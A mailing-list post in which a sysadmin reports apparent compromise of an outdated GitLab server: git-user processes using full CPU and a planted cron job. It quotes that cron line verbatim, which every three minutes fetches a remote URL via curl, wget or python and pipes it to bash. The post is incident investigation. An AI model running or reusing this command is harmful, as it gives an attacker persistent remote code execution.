[Adminsysters] Debug gitlab

mara mara at multiplace.org
Fri Jan 21 10:41:21 CET 2022

I sshed and saw the htop stats running in the session
"server". Git user was running a couple of processes with the same weird 
command '7432xxxx'. See the screenshot attached. These processes were 
consuming ~100% CPU.
I installed strace to see what this command is doing, during the 
installation of strace, I got a message that gitlab-runsvdir.service was 
running outdated libraries and needed restart, I pressed OK, and strace 
continued its installation.
After that, the above git processes were not there anymore.

Now, I don't know how this could be related to bandwidth, and if it is.
But our gitlab is running a rather old version, and it urgently needs 
upgrade, see related issue:

Also last month, while looking into crontab for our backups automate 
policy, we noticed the following weird cron job running with git, every 
  3min ->
echo "*/3 * * * * (curl -fsSL $url||wget -q -O- $url||python -c 'import 
urllib2 as fbi;print fbi.urlopen(\"$url\").read()')| bash -sh" | crontab -
which reads the body of the above url and pipes it to bash. A whoseip 
showed a chinese mobile operator.
ignifugo mentioned something about a vulnerability exploit when we 
discussed it in our meetings during rc3.

Anyhow I checked again if git is running any cronjobs, but no.
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